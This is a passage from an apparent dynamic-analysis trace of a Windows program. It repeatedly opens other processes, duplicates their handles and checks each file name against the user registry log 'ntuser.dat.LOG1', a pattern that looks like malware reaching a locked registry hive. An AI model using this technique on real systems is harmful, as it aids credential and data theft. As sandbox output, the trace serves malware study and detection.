lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0161.110] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0161.111] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0161.111] CloseHandle (hObject=0x1e4) returned 1 [0161.111] CloseHandle (hObject=0x194) returned 1 [0161.111] CloseHandle (hObject=0x1e8) returned 1 [0161.111] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x2c8) returned 0x1e8 [0161.111] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x634, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0161.111] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0161.112] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0161.113] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0161.113] CloseHandle (hObject=0x1e4) returned 1 [0161.113] CloseHandle (hObject=0x194) returned 1 [0161.113] CloseHandle (hObject=0x1e8) returned 1 [0161.113] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x2c8) returned 0x1e8 [0161.113] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x64c, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0161.113] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0161.114] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0161.114] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0161.114] CloseHandle (hObject=0x1e4) returned 1 [0161.114] _wcsicmp (_Str1="\\Microsoft-Windows-Diagnostics-Performance%4Operational.evtx", _Str2="\\ntuser.dat.LOG1") returned -1 [0161.114] CloseHandle (hObject=0x194) returned 1 [0161.115] CloseHandle (hObject=0x1e8) returned 1 [0161.115] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x2c8) returned 0x1e8 [0161.115] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x650, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0161.115] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0161.115] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0161.116] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0161.116] CloseHandle (hObject=0x1e4) returned 1 [0161.116] _wcsicmp (_Str1="\\Microsoft-Windows-WindowsBackup%4ActionCenter.evtx", _Str2="\\ntuser.dat.LOG1") returned -1 [0161.116] CloseHandle (hObject=0x194) returned 1 [0161.116] CloseHandle (hObject=0x1e8) returned 1 [0161.116] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x2c8) returned 0x1e8 [0161.116] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x67c, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0161.116] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0161.117] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0161.118] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0161.118] CloseHandle (hObject=0x1e4) returned 1 [0161.118] _wcsicmp (_Str1="\\wkssvc", _Str2="\\ntuser.dat.LOG1") returned 9 [0161.118] CloseHandle (hObject=0x194) returned 1 [0161.118] CloseHandle (hObject=0x1e8) returned 1 [0161.118] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x2c8) returned 0x1e8 [0161.118] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x6ac, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0161.118] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0161.119] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0161.120] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0161.120] CloseHandle (hObject=0x1e4) returned 1 [0161.120] _wcsicmp (_Str1="\\WindowsUpdate.log", _Str2="\\ntuser.dat.LOG1") returned 9 [0161.120] CloseHandle (hObject=0x194) returned 1 [0161.120] CloseHandle (hObject=0x1e8) returned 1 [0161.120] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x2c8) returned 0x1e8 [0161.120] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x6d8, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0161.120] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0161.121] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0161.122] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0161.122] CloseHandle (hObject=0x1e4) returned 1 [0161.122] _wcsicmp (_Str1="\\Microsoft-Windows-Windows Defender%4Operational.evtx", _Str2="\\ntuser.dat.LOG1") returned -1 [0161.122] CloseHandle (hObject=0x194) returned 1 [0161.122] CloseHandle (hObject=0x1e8) returned 1 [0161.122] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x2c8) returned 0x1e8 [0161.122] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x6dc, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0161.122] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0161.123] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0161.124] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0161.124] CloseHandle (hObject=0x1e4) returned 1 [0161.124] _wcsicmp (_Str1="\\Microsoft-Windows-Windows Defender%4WHC.evtx", _Str2="\\ntuser.dat.LOG1") returned -1 [0161.124] CloseHandle (hObject=0x194) returned 1 [0161.124] CloseHandle (hObject=0x1e8) returned 1 [0161.124] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x2c8) returned 0x1e8 [0161.124] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x730, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0161.124] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0161.125] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0161.126] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0161.126] CloseHandle (hObject=0x1e4) returned 1 [0161.126] _wcsicmp (_Str1="\\Microsoft-Windows-WindowsUpdateClient%4Operational.evtx", _Str2="\\ntuser.dat.LOG1") returned -1 [0161.126] CloseHandle (hObject=0x194) returned 1 [0161.126] CloseHandle (hObject=0x1e8) returned 1 [0161.126] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x2c8) returned 0x1e8 [0161.126] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x73c, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0161.126] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0161.127] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0161.128] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0161.128] CloseHandle (hObject=0x1e4) returned 1 [0161.128] _wcsicmp (_Str1="\\Microsoft-Windows-NetworkAccessProtection%4WHC.evtx", _Str2="\\ntuser.dat.LOG1") returned -1 [0161.128] CloseHandle (hObject=0x194) returned 1 [0161.128] CloseHandle (hObject=0x1e8) returned 1 [0161.128] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x2c8) returned 0x1e8 [0161.128] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x750, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0161.128] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0161.129] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0161.130] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0161.130] CloseHandle (hObject=0x1e4) returned 1 [0161.130] _wcsicmp (_Str1="\\Microsoft-Windows-Diagnosis-Scheduled%4Operational.evtx", _Str2="\\ntuser.dat.LOG1") returned -1 [0161.130] CloseHandle (hObject=0x194) returned 1 [0161.130] CloseHandle (hObject=0x1e8) returned 1 [0161.130] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x2c8) returned 0x1e8 [0161.130] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x75c, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0161.130] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0161.131] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0161.132] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0161.132] CloseHandle (hObject=0x1e4) returned 1 [0161.132] _wcsicmp (_Str1="\\Microsoft-Windows-Resource-Exhaustion-Resolver%4Operational.evtx", _Str2="\\ntuser.dat.LOG1") returned -1 [0161.132] CloseHandle (hObject=0x194) returned 1 [0161.132] CloseHandle (hObject=0x1e8) returned 1 [0161.132] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x338) returned 0x1e8 [0161.132] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0xc, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0161.132] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0161.133] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0161.134] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0161.134] CloseHandle (hObject=0x1e4) returned 1 [0161.134] _wcsicmp (_Str1="\\System32", _Str2="\\ntuser.dat.LOG1") returned 5 [0161.134] CloseHandle (hObject=0x194) returned 1 [0161.134] CloseHandle (hObject=0x1e8) returned 1 [0161.134] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x338) returned 0x1e8 [0161.134] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x5c, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0161.134] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0161.135] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0161.135] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0161.135] CloseHandle (hObject=0x1e4) returned 1 [0161.135] CloseHandle (hObject=0x194) returned 1 [0161.136] CloseHandle (hObject=0x1e8) returned 1 [0161.136] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x338) returned 0x1e8 [0161.136] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x15c, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0161.136] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0161.136] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0161.137] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0161.137] CloseHandle (hObject=0x1e4) returned 1 [0161.137] CloseHandle (hObject=0x194) returned 1 [0161.137] CloseHandle (hObject=0x1e8) returned 1 [0161.137] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x338) returned 0x1e8 [0161.137] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x180, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0161.137] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0161.138] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0161.139] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0161.139] CloseHandle (hObject=0x1e4) returned 1 [0161.139] CloseHandle (hObject=0x194) returned 1 [0161.139] CloseHandle (hObject=0x1e8) returned 1 [0161.139] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x338) returned 0x1e8 [0161.139] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x20c, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0161.140] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0161.140] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0161.141] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0161.141] CloseHandle (hObject=0x1e4) returned 1 [0161.141] CloseHandle (hObject=0x194) returned 1 [0161.141] CloseHandle (hObject=0x1e8) returned 1 [0161.141] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x338) returned 0x1e8 [0161.141] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x298, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0161.141] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0161.142] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0161.143] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0161.143] CloseHandle (hObject=0x1e4) returned 1 [0161.144] _wcsicmp (_Str1="\\.", _Str2="\\ntuser.dat.LOG1") returned -64 [0161.144] CloseHandle (hObject=0x194) returned 1 [0161.144] CloseHandle (hObject=0x1e8) returned 1 [0161.144] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x338) returned 0x1e8 [0161.144] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x2c8, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0161.144] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0161.144] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0161.145] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0161.145] CloseHandle (hObject=0x1e4) returned 1 [0161.145] _wcsicmp (_Str1="\\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_fa396087175ac9ac", _Str2="\\ntuser.dat.LOG1") returned -13 [0161.145] CloseHandle (hObject=0x194) returned 1 [0161.146] CloseHandle (hObject=0x1e8) returned 1 [0161.146] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x338) returned 0x1e8 [0161.146] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x448, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0161.146] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0161.146] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0161.147] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0161.147] CloseHandle (hObject=0x1e4) returned 1 [0161.147] _wcsicmp (_Str1="\\$ObjId", _Str2="\\ntuser.dat.LOG1") returned -74 [0161.147] CloseHandle (hObject=0x194) returned 1 [0161.147] CloseHandle (hObject=0x1e8) returned 1 [0161.147] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x338) returned 0x1e8 [0161.147] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x45c, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0161.148] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0161.148] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0161.149] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0161.149] CloseHandle (hObject=0x1e4) returned 1 [0161.149] CloseHandle (hObject=0x194) returned 1 [0161.149] CloseHandle (hObject=0x1e8) returned 1 [0161.149] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x338) returned 0x1e8 [0161.149] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x468, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0161.149] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0161.150] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0161.151] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0161.151] CloseHandle (hObject=0x1e4) returned 1 [0161.151] _wcsicmp (_Str1="\\tracking.log", _Str2="\\ntuser.dat.LOG1") returned 6 [0161.151] CloseHandle (hObject=0x194) returned 1 [0161.151] CloseHandle (hObject=0x1e8) returned 1 [0161.151] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x338) returned 0x1e8 [0161.151] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x46c, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0161.151] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0161.152] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0161.156] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0161.156] CloseHandle (hObject=0x1e4) returned 1 [0161.157] _wcsicmp (_Str1="\\trkwks", _Str2="\\ntuser.dat.LOG1") returned 6 [0161.157] CloseHandle (hObject=0x194) returned 1 [0161.157] CloseHandle (hObject=0x1e8) returned 1 [0161.157] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x338) returned 0x1e8 [0161.157] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x470, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0161.157] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0161.158] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0161.159] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0161.159] CloseHandle (hObject=0x1e4) returned 1 [0161.159] _wcsicmp (_Str1="\\trkwks", _Str2="\\ntuser.dat.LOG1") returned 6 [0161.159] CloseHandle (hObject=0x194) returned 1 [0161.159] CloseHandle (hObject=0x1e8) returned 1 [0161.159] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x338) returned 0x1e8 [0161.159] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x474, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0161.160] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0161.163] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0161.164] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0161.164] CloseHandle (hObject=0x1e4) returned 1 [0161.165] _wcsicmp (_Str1="\\trkwks", _Str2="\\ntuser.dat.LOG1") returned 6 [0161.165] CloseHandle (hObject=0x194) returned 1 [0161.165] CloseHandle (hObject=0x1e8) returned 1 [0161.165] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x338) returned 0x1e8 [0161.165] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x580, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0161.165] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0161.165] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0161.166] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0161.166] CloseHandle (hObject=0x1e4) returned 1 [0161.166] CloseHandle (hObject=0x194) returned 1 [0161.166] CloseHandle (hObject=0x1e8) returned 1 [0161.166] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x338) returned 0x1e8 [0161.166] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x584, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0161.166] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0161.168] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0161.169] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0161.169] CloseHandle (hObject=0x1e4) returned 1 [0161.169] CloseHandle (hObject=0x194) returned 1 [0161.169] CloseHandle (hObject=0x1e8) returned 1 [0161.169] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x338) returned 0x1e8 [0161.169] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x660, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0161.169] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 